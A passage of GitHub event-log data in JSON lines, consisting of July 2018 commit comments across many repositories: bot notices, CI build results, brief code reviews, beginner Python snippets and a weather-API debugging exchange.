{"id":"7907312010","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyophidia-feedstock"},"payload":{"comment":{"id":29568136,"position":null,"line":null,"path":null,"commit_id":"4a40bd3b04454a6dbfac0fe54e4670947cfaac2c","created_at":"2018-07-02T15:16:45Z","updated_at":"2018-07-02T15:16:45Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @aledanca were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @aledanca were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-02T15:16:45Z"}
{"id":"7907313157","type":"CommitCommentEvent","actor":{"login":"inyutin-maxim"},"repo":{"name":"vknet/vk"},"payload":{"comment":{"id":29568144,"position":null,"line":null,"path":null,"commit_id":"c4676ecb7b070a264ea541cdb8f0b7337aae0ff7","created_at":"2018-07-02T15:16:57Z","updated_at":"2018-07-02T15:16:57Z","author_association":"MEMBER","body":"Двухфакторая авторизация & Captcha Solver. #591"}},"created_at":"2018-07-02T15:16:57Z"}
{"id":"7907313355","type":"CommitCommentEvent","actor":{"login":"AngelGonzalez16"},"repo":{"name":"figofigo00/proyecto-ICC"},"payload":{"comment":{"id":29568145,"position":2,"line":2,"path":"README.md","commit_id":"8df5c7af4440218f75cfb02356132c6a99f44caf","created_at":"2018-07-02T15:16:59Z","updated_at":"2018-07-02T15:16:59Z","author_association":"COLLABORATOR","body":"Trabajo desarrollado durante las clases de Laboratorio del curso de ICC, el objetivo del proyecto es crear un programa donde el usuario pueda aprender a programar en Python."}},"created_at":"2018-07-02T15:16:59Z"}
{"id":"7907313971","type":"CommitCommentEvent","actor":{"login":"rsaez"},"repo":{"name":"shaheinm/gtfebproject3"},"payload":{"comment":{"id":29568148,"position":null,"line":null,"path":null,"commit_id":"34378aa57e23113cc77411e7dc863aede20fd502","created_at":"2018-07-02T15:17:07Z","updated_at":"2018-07-02T15:17:07Z","author_association":"NONE","body":"Adding Fashionzen work"}},"created_at":"2018-07-02T15:17:07Z"}
{"id":"7907314390","type":"CommitCommentEvent","actor":{"login":"wuyaf"},"repo":{"name":"wuyaf/-"},"payload":{"comment":{"id":29568151,"position":1,"line":1,"path":"README.md","commit_id":"3cfbda28f6ee423da9cfc1468a9003e540e7757c","created_at":"2018-07-02T15:17:11Z","updated_at":"2018-07-02T15:17:11Z","author_association":"OWNER","body":"memder71226     managent91533\r\n"}},"created_at":"2018-07-02T15:17:11Z"}
{"id":"7907320777","type":"CommitCommentEvent","actor":{"login":"ghedo"},"repo":{"name":"ekr/draft-rescorla-tls-esni"},"payload":{"comment":{"id":29568165,"position":10,"line":282,"path":"draft-rescorla-tls-esni.md","commit_id":"6790c4bb482c95a60dc8c8eac7559b509167cbd7","created_at":"2018-07-02T15:18:20Z","updated_at":"2018-07-02T15:18:20Z","author_association":"CONTRIBUTOR","body":"The point of preventing clients to cache on not_after was to avoid exactly this situation. If the server needs to keep keys around for N days anyway, I don't think it makes sense to rotate them every M hours from a forward secrecy perspective. A compromise of the server would expose all keys anyway."}},"created_at":"2018-07-02T15:18:20Z"}
{"id":"7907321398","type":"CommitCommentEvent","actor":{"login":"sathishkumar93"},"repo":{"name":"sarumathi1894/saru"},"payload":{"comment":{"id":29568166,"position":10,"line":10,"path":"unique_string.py","commit_id":"880e20581343f9f0f040d77f585890f2ac108919","created_at":"2018-07-02T15:18:27Z","updated_at":"2018-07-02T15:18:27Z","author_association":"COLLABORATOR","body":"what is the use of semicolon here?"}},"created_at":"2018-07-02T15:18:27Z"}
{"id":"7907322125","type":"CommitCommentEvent","actor":{"login":"agitator"},"repo":{"name":"collective/collective.azipfele"},"payload":{"comment":{"id":29568168,"position":null,"line":null,"path":null,"commit_id":"1485c0bf76ac06e9e8627c7ccf6a02e8a10ce05b","created_at":"2018-07-02T15:18:35Z","updated_at":"2018-07-02T15:18:35Z","author_association":"MEMBER","body":"mea culpa, zest.releaser ftw ;-)"}},"created_at":"2018-07-02T15:18:35Z"}
{"id":"7907325789","type":"CommitCommentEvent","actor":{"login":"yhj20041128001"},"repo":{"name":"yhj20041128001/face-recognition"},"payload":{"comment":{"id":29568174,"position":null,"line":null,"path":null,"commit_id":"99258caeb036a80936e93c76ddd57c2128786008","created_at":"2018-07-02T15:19:15Z","updated_at":"2018-07-02T15:19:15Z","author_association":"OWNER","body":"Author: YangHongjun"}},"created_at":"2018-07-02T15:19:15Z"}
{"id":"7907335318","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568189,"position":1,"line":41,"path":"log/src/main/java/com/axway/ats/log/autodb/DbEventRequestProcessor.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T15:20:57Z","updated_at":"2018-07-02T15:20:57Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T15:20:57Z"}
{"id":"7907336865","type":"CommitCommentEvent","actor":{"login":"redeluni"},"repo":{"name":"redeluni/blog"},"payload":{"comment":{"id":29568192,"position":null,"line":null,"path":null,"commit_id":"1a08eb1c63df285c7f8b35f569805d83574a6511","created_at":"2018-07-02T15:21:14Z","updated_at":"2018-07-02T15:21:14Z","author_association":"OWNER","body":"che palle"}},"created_at":"2018-07-02T15:21:14Z"}
{"id":"7907337064","type":"CommitCommentEvent","actor":{"login":"ACHF36"},"repo":{"name":"kimc-s/icc"},"payload":{"comment":{"id":29568193,"position":6,"line":6,"path":"buscaminas","commit_id":"fa9be622961b3b6dbe6c0a7840617e6b413e8674","created_at":"2018-07-02T15:21:16Z","updated_at":"2018-07-02T15:21:16Z","author_association":"COLLABORATOR","body":"while minas < 3:\r\n        mina = randint(0,5)\r\n        if mina == 1:\r\n            lista[contador] = \"*!\"\r\n            minas = minas + 1\r\n        contador = contador + 1\r\n        if contador == 20:\r\n            contador = 0\r\n    tupla_llena = tuple(lista)\r\n    return tupla_llena\r\n\r\n#Invocar a la función \"tupla_minada\" y devolver el valor a una variable \"tupla\"\r\ntupla = tupla_minada()\r\nprint(tupla)\r\n\r\n#Desarrollar el ejercicio 1, Mostrar en pantalla como en el ejemplo de la diapositiva\r\n\r\n#Desarrollar el ejercicio 2, Solicitar ingresar los número para jugar.\r\n"}},"created_at":"2018-07-02T15:21:16Z"}
{"id":"7907342787","type":"CommitCommentEvent","actor":{"login":"Thomas-Smyth"},"repo":{"name":"SmartPhoenix/Persistent-Kingdoms"},"payload":{"comment":{"id":29568206,"position":114,"line":1209,"path":"module_mission_templates.py","commit_id":"f098181d9a395b347a712e68555f2b2bb6706329","created_at":"2018-07-02T15:22:17Z","updated_at":"2018-07-02T15:22:17Z","author_association":"MEMBER","body":"Does this still prevent weapon drawing?"}},"created_at":"2018-07-02T15:22:17Z"}
{"id":"7907353884","type":"CommitCommentEvent","actor":{"login":"if-kyle"},"repo":{"name":"jonnenauha/prometheus_varnish_exporter"},"payload":{"comment":{"id":29568233,"position":null,"line":null,"path":null,"commit_id":"8ec3d150f3983baa679ced2a3222fe9b60dd2946","created_at":"2018-07-02T15:24:18Z","updated_at":"2018-07-02T15:24:18Z","author_association":"NONE","body":"Remove extra mkdir command"}},"created_at":"2018-07-02T15:24:18Z"}
{"id":"7907375813","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29568289,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-02T15:28:18Z","updated_at":"2018-07-02T15:28:18Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 146](https://teamcity.otenv.com/viewLog.html?buildId=8846424&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-02T15:28:18Z"}
{"id":"7907377834","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568292,"position":1,"line":21,"path":"log/src/main/java/com/axway/ats/log/autodb/QueueLoggerThread.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T15:28:39Z","updated_at":"2018-07-02T15:28:39Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T15:28:39Z"}
{"id":"7907384442","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29568312,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-02T15:29:52Z","updated_at":"2018-07-02T15:29:52Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 146](https://teamcity.otenv.com/viewLog.html?buildId=8846424&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **SUCCESS**\nSummary: Tests passed: 15 Build time: 00:01:34"}},"created_at":"2018-07-02T15:29:52Z"}
{"id":"7907389499","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29568328,"position":null,"line":null,"path":null,"commit_id":"eb68ccb2bfb3d01807412e33399299da8cdb4b11","created_at":"2018-07-02T15:30:44Z","updated_at":"2018-07-02T15:30:44Z","author_association":"NONE","body":"158538153-Maximum-Curve-Output-is-always-ignored-#6365 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2929 of 2929 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eb68ccb2bfb3d01807412e33399299da8cdb4b11-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eb68ccb2bfb3d01807412e33399299da8cdb4b11-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-02T15:30:44Z"}
{"id":"7907393207","type":"CommitCommentEvent","actor":{"login":"sarahbwebdev"},"repo":{"name":"sarahbwebdev/A-Photo-Gallery-webpage"},"payload":{"comment":{"id":29568338,"position":null,"line":null,"path":null,"commit_id":"ac05196d9b215ca7ef42542acb3e59af022e87ca","created_at":"2018-07-02T15:31:22Z","updated_at":"2018-07-02T15:31:22Z","author_association":"OWNER","body":"I could make this a lot easier on myself if I stopped being so stubborn and just used jQuery. Something to think about.\r\n\r\nAlso, I definitely do not need to include all 40 photographs. No one has the attention span for that and it will take way too long to load."}},"created_at":"2018-07-02T15:31:22Z"}
{"id":"7907395986","type":"CommitCommentEvent","actor":{"login":"Knurlnheim"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":29568344,"position":null,"line":null,"path":null,"commit_id":"0e2e8d2e2aca2f8d0f1f2eb7b213577fcc4f623a","created_at":"2018-07-02T15:31:51Z","updated_at":"2018-07-02T15:31:51Z","author_association":"NONE","body":"Here's a dump of the retrieved JSON :\r\n{\"city\":{\"id\":2998324,\"name\":\"Lille\",\"coord\":{\"lon\":3.0586,\"lat\":50.633},\"country\":\"FR\",\"population\":0},\"cod\":\"200\",\"message\":7.9564336,\"cnt\":7,\"list\":[{\"dt\":1530529200,\"temp\":{\"day\":26.41,\"min\":19.95,\"max\":27.93,\"night\":19.95,\"eve\":27.04,\"morn\":26.41},\"pressure\":1020.55,\"humidity\":31,\"weather\":[{\"id\":800,\"main\":\"Clear\",\"description\":\"ciel dégagé\",\"icon\":\"01d\"}],\"speed\":5.61,\"deg\":69,\"clouds\":0},{\"dt\":1530615600,\"temp\":{\"day\":28.38,\"min\":19.27,\"max\":29.52,\"night\":19.37,\"eve\":28.41,\"morn\":19.27},\"pressure\":1022.44,\"humidity\":32,\"weather\":[{\"id\":800,\"main\":\"Clear\",\"description\":\"ciel dégagé\",\"icon\":\"02d\"}],\"speed\":4.47,\"deg\":64,\"clouds\":8},{\"dt\":1530702000,\"temp\":{\"day\":29.2,\"min\":17.81,\"max\":30.37,\"night\":17.81,\"eve\":28.98,\"morn\":18.31},\"pressure\":1019.16,\"humidity\":35,\"weather\":[{\"id\":800,\"main\":\"Clear\",\"description\":\"ciel dégagé\",\"icon\":\"02d\"}],\"speed\":2.01,\"deg\":16,\"clouds\":8},{\"dt\":1530788400,\"temp\":{\"day\":26.83,\"min\":16,\"max\":27.69,\"night\":17.6,\"eve\":26.89,\"morn\":16},\"pressure\":1021.67,\"humidity\":43,\"weather\":[{\"id\":802,\"main\":\"Clouds\",\"description\":\"partiellement nuageux\",\"icon\":\"03d\"}],\"speed\":2.57,\"deg\":283,\"clouds\":36},{\"dt\":1530874800,\"temp\":{\"day\":22.19,\"min\":16.08,\"max\":22.19,\"night\":17.44,\"eve\":21.67,\"morn\":16.08},\"pressure\":1026.86,\"humidity\":0,\"weather\":[{\"id\":500,\"main\":\"Rain\",\"description\":\"légère pluie\",\"icon\":\"10d\"}],\"speed\":4.51,\"deg\":34,\"clouds\":48,\"rain\":0.85},{\"dt\":1530961200,\"temp\":{\"day\":23.12,\"min\":17.4,\"max\":24.1,\"night\":18.26,\"eve\":24.1,\"morn\":17.4},\"pressure\":1032.35,\"humidity\":0,\"weather\":[{\"id\":800,\"main\":\"Clear\",\"description\":\"ciel dégagé\",\"icon\":\"01d\"}],\"speed\":2.7,\"deg\":315,\"clouds\":0},{\"dt\":1531047600,\"temp\":{\"day\":25.85,\"min\":18.9,\"max\":25.87,\"night\":18.9,\"eve\":25.87,\"morn\":20.04},\"pressure\":1033.12,\"humidity\":0,\"weather\":[{\"id\":800,\"main\":\"Clear\",\"description\":\"ciel dégagé\",\"icon\":\"01d\"}],\"speed\":3.92,\"deg\":295,\"clouds\":0}]}"}},"created_at":"2018-07-02T15:31:51Z"}
{"id":"7907396226","type":"CommitCommentEvent","actor":{"login":"bemilio"},"repo":{"name":"rosariovg/SuCArol"},"payload":{"comment":{"id":29568347,"position":null,"line":null,"path":null,"commit_id":"094155a867769537d41bdb2bdb81f1e1c88e0c56","created_at":"2018-07-02T15:31:54Z","updated_at":"2018-07-02T15:31:54Z","author_association":"NONE","body":"Sucarolino!"}},"created_at":"2018-07-02T15:31:54Z"}
{"id":"7907396550","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568348,"position":1,"line":35,"path":"log/src/test/java/com/axway/ats/log/model/Test_AutoLogger.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T15:31:57Z","updated_at":"2018-07-02T15:31:57Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T15:31:57Z"}
{"id":"7907397691","type":"CommitCommentEvent","actor":{"login":"chuwilliamson"},"repo":{"name":"lukeplaisance/Unity-Production-VC"},"payload":{"comment":{"id":29568352,"position":null,"line":null,"path":null,"commit_id":"ad95ee78ea4106f462fdf760bd68a2d888917548","created_at":"2018-07-02T15:32:10Z","updated_at":"2018-07-02T15:32:10Z","author_association":"COLLABORATOR","body":"don't make new files @keithparkerart . Bike@Pose.fbx would suffice"}},"created_at":"2018-07-02T15:32:10Z"}
{"id":"7907403061","type":"CommitCommentEvent","actor":{"login":"freefolling"},"repo":{"name":"Geograph-us/Cloud-Mail.Ru-Downloader"},"payload":{"comment":{"id":29568359,"position":null,"line":null,"path":null,"commit_id":"7ab4165cc8eb730aa23f9fce80af39dd73a70033","created_at":"2018-07-02T15:33:09Z","updated_at":"2018-07-02T15:33:09Z","author_association":"NONE","body":"Добрый день. Помогите пожалуйста. Все сделал, как написано и показано. Не могу понять. Я не программист, но редактор установил.\r\n[Новый текстовый документ.txt](https://github.com/Geograph-us/Cloud-Mail.Ru-Downloader/files/2155804/default.txt)\r\nВсе атрибуты сняты. Правило доступа все все могут.\r\n"}},"created_at":"2018-07-02T15:33:09Z"}
{"id":"7907413413","type":"CommitCommentEvent","actor":{"login":"chrisbobbe"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29568391,"position":null,"line":null,"path":null,"commit_id":"be56a3efeefefa6dca816ca5149a3dabfa5164e2","created_at":"2018-07-02T15:35:01Z","updated_at":"2018-07-02T15:35:01Z","author_association":"NONE","body":"Thank you for this much-anticipated support!! I was wondering if the implementation for FileReader.readAsArrayBuffer might be coming soon, or if there's a workaround for me to read a blob as an ArrayBuffer? I'm happy to think about how this implementation might be done, I just wasn't sure if there were known difficulties that were already being considered."}},"created_at":"2018-07-02T15:35:01Z"}
{"id":"7907413623","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"rust-lang/rust"},"payload":{"comment":{"id":29568394,"position":5,"line":260,"path":"src/librustc_data_structures/indexed_set.rs","commit_id":"9cc337339c7730335364079cd94ed92f58efa046","created_at":"2018-07-02T15:35:03Z","updated_at":"2018-07-02T15:35:03Z","author_association":"CONTRIBUTOR","body":"hmm `overwrite` exists on master..."}},"created_at":"2018-07-02T15:35:03Z"}
{"id":"7907414512","type":"CommitCommentEvent","actor":{"login":"freefolling"},"repo":{"name":"Geograph-us/Cloud-Mail.Ru-Downloader"},"payload":{"comment":{"id":29568395,"position":null,"line":null,"path":null,"commit_id":"7ab4165cc8eb730aa23f9fce80af39dd73a70033","created_at":"2018-07-02T15:35:13Z","updated_at":"2018-07-02T15:35:13Z","author_association":"NONE","body":"Мне очень нужно победить. Иначе я погибну качая и раскладывая по папкам. https://cloud.mail.ru/public/58RU/JXWXhKPKX/"}},"created_at":"2018-07-02T15:35:13Z"}
{"id":"7907418932","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29568411,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-02T15:36:01Z","updated_at":"2018-07-02T15:36:01Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 223](https://teamcity.otenv.com/viewLog.html?buildId=8846471&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) is now running\n"}},"created_at":"2018-07-02T15:36:01Z"}
{"id":"7907419300","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29568413,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-02T15:36:05Z","updated_at":"2018-07-02T15:36:05Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 223](https://teamcity.otenv.com/viewLog.html?buildId=8846471&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:04"}},"created_at":"2018-07-02T15:36:05Z"}
{"id":"7907419383","type":"CommitCommentEvent","actor":{"login":"chrislo"},"repo":{"name":"bhrrc/modernslaveryregistry.org"},"payload":{"comment":{"id":29568415,"position":null,"line":null,"path":null,"commit_id":"da803d86101bcbe6612f2c89ffd5cde484826ed9","created_at":"2018-07-02T15:36:06Z","updated_at":"2018-07-02T15:36:06Z","author_association":"CONTRIBUTOR","body":"Thanks @aslakhellesoy - that's some very helpful context. "}},"created_at":"2018-07-02T15:36:06Z"}
{"id":"7907421149","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29568427,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-02T15:36:25Z","updated_at":"2018-07-02T15:36:25Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 190](https://teamcity.otenv.com/viewLog.html?buildId=8846478&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-02T15:36:25Z"}
{"id":"7907421394","type":"CommitCommentEvent","actor":{"login":"mholocher"},"repo":{"name":"mholocher/A4D_Sample_MH_Toolchain"},"payload":{"comment":{"id":29568428,"position":null,"line":null,"path":null,"commit_id":"5c9be8ffaad43020f872b7150abf8add13f60a85","created_at":"2018-07-02T15:36:28Z","updated_at":"2018-07-02T15:36:28Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/f69b80e1-e0cc-41b9-80d9-93d197467546?env_id=ibm%3Ayp%3Aus-south \"A4D_Sample_MH_Toolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/ce1e535e-eaa1-4598-a9cc-d1c553680751?env_id=ibm%3Ayp%3Aus-south \"A4D_Sample_MH_Toolchain\") deployed [A4D_Sample_MH_Toolchain](https://github.com/mholocher/A4D_Sample_MH_Toolchain/releases/tag/deploy-ibm-yp-us-south-ZeroToCognitive_MHolocher-dev-20180702-153627 \"deploy-ibm-yp-us-south-ZeroToCognitive_MHolocher-dev-20180702-153627\") to [dev](https://console.bluemix.net/apps/8afd54a9-b347-4e32-b0e5-bf331f6336e6?env_id=ibm:yp:us-south \"ibm:yp:us-south:ZeroToCognitive_MHolocher:dev\"), including this commit"}},"created_at":"2018-07-02T15:36:28Z"}
{"id":"7907421642","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29568430,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-02T15:36:31Z","updated_at":"2018-07-02T15:36:31Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 190](https://teamcity.otenv.com/viewLog.html?buildId=8846478&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:05"}},"created_at":"2018-07-02T15:36:31Z"}
{"id":"7907423472","type":"CommitCommentEvent","actor":{"login":"facelessuser"},"repo":{"name":"facelessuser/MarkdownPreview"},"payload":{"comment":{"id":29568446,"position":null,"line":null,"path":null,"commit_id":"8f3f39e9b30a38004ba4eeb6056af7c65da28d3a","created_at":"2018-07-02T15:36:51Z","updated_at":"2018-07-02T15:36:51Z","author_association":"OWNER","body":"Isn't KaTeX's default to center?"}},"created_at":"2018-07-02T15:36:51Z"}
{"id":"7907423474","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568447,"position":1,"line":22,"path":"monitoringlibrary/src/main/java/com/axway/ats/monitoring/RestHelper.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T15:36:52Z","updated_at":"2018-07-02T15:36:52Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T15:36:52Z"}
{"id":"7907423671","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29568448,"position":null,"line":null,"path":null,"commit_id":"175f9438e55ad82c529e9fcf814d5a2bb203bedd","created_at":"2018-07-02T15:36:54Z","updated_at":"2018-07-02T15:36:54Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-12](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-12).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-12-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-02T15:36:54Z"}
{"id":"7907431943","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568484,"position":1,"line":483,"path":"utilities/s3-utilities/src/main/java/com/axway/ats/action/s3/S3Operations.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T15:38:25Z","updated_at":"2018-07-02T15:38:25Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T15:38:25Z"}
{"id":"7907436221","type":"CommitCommentEvent","actor":{"login":"jannekalliola"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":29568487,"position":null,"line":null,"path":null,"commit_id":"0e2e8d2e2aca2f8d0f1f2eb7b213577fcc4f623a","created_at":"2018-07-02T15:39:11Z","updated_at":"2018-07-02T15:39:11Z","author_association":"CONTRIBUTOR","body":"Interesting. It does not have dt_txt field at all. No wonder that it does not work properly. As I'm away from my system and development environment, could you try the following code?\r\n\r\n```javascript\r\nvar day;\r\nvar hour;\r\nif(!!forecast.dt_txt) {\r\n\tday = moment(forecast.dt_txt, \"YYYY-MM-DD hh:mm:ss\").format(\"ddd\");\r\n\thour = moment(forecast.dt_txt, \"YYYY-MM-DD hh:mm:ss\").format(\"H\");\r\n} else {\r\n\tday = moment(forecast.dt, \"X\").format(\"ddd\");\r\n\thour = moment(forecast.dt, \"X\").format(\"H\");\r\n}\r\n```\r\n\r\nReplace lines 336 and 337 with this snippet."}},"created_at":"2018-07-02T15:39:11Z"}
{"id":"7907437470","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29568489,"position":24,"line":39,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/GeneratedClassLoader.java","commit_id":"9d7b0c460b8c455aa8539aa42fd3c16ffc060fc4","created_at":"2018-07-02T15:39:24Z","updated_at":"2018-07-02T15:39:24Z","author_association":"MEMBER","body":"I've made it for tests, but this class loader is also used in script runners"}},"created_at":"2018-07-02T15:39:24Z"}
{"id":"7907439867","type":"CommitCommentEvent","actor":{"login":"MarshalX"},"repo":{"name":"jadugd/SalienSnake"},"payload":{"comment":{"id":29568491,"position":null,"line":null,"path":null,"commit_id":"dc1ae9735634cba1ffc5e751d171ce8f2a3965ce","created_at":"2018-07-02T15:39:50Z","updated_at":"2018-07-02T15:39:50Z","author_association":"NONE","body":"Everyone sees your token. They can use it and stop you from getting experience ..."}},"created_at":"2018-07-02T15:39:50Z"}
{"id":"7907441659","type":"CommitCommentEvent","actor":{"login":"Ckingbigdata"},"repo":{"name":"martin-martin/nlpython"},"payload":{"comment":{"id":29568496,"position":24,"line":24,"path":"martin_1.py","commit_id":"6db4004e1f9f45b57fb260a7cec1ae6aaaadfe5b","created_at":"2018-07-02T15:40:11Z","updated_at":"2018-07-02T15:40:11Z","author_association":"NONE","body":"hiking = [\"devil's den\", \"old lady\", \"north rim\", \"where angel's fly\"]\r\nprint(hiking)\r\nhiking.extend([\"martin's trail\", \"casey's swimlane\"])\r\nprint(hiking)\r\nimport string\r\nhiking_capped = \", \".join(hiking)\r\nstring.capwords(hiking_capped)\r\nprint(string.capwords(hiking_capped))"}},"created_at":"2018-07-02T15:40:11Z"}
{"id":"7907443009","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29568499,"position":22,"line":37,"path":"core/descriptors.runtime/src/kotlin/reflect/jvm/internal/components/RuntimePackagePartProvider.kt","commit_id":"9d7b0c460b8c455aa8539aa42fd3c16ffc060fc4","created_at":"2018-07-02T15:40:24Z","updated_at":"2018-07-02T15:40:24Z","author_association":"MEMBER","body":"I forgot to modify it here 🤦‍♂️ "}},"created_at":"2018-07-02T15:40:24Z"}
{"id":"7907443117","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29568500,"position":null,"line":null,"path":null,"commit_id":"9b0d34c8fa79e1e81da996bf51512bcbcf47271c","created_at":"2018-07-02T15:40:25Z","updated_at":"2018-07-02T15:40:25Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-12](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-12).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-12-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-02T15:40:25Z"}
{"id":"7907449140","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29568514,"position":null,"line":null,"path":null,"commit_id":"48767e21ebd16eb946cf58b2c39a5e604431653c","created_at":"2018-07-02T15:41:32Z","updated_at":"2018-07-02T15:41:32Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/56/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/56//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/48767e21ebd16eb946cf58b2c39a5e604431653c/56/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/48767e21ebd16eb946cf58b2c39a5e604431653c/56/jenkins-results/apicomparison/index.html) (please review changes)\n✅ 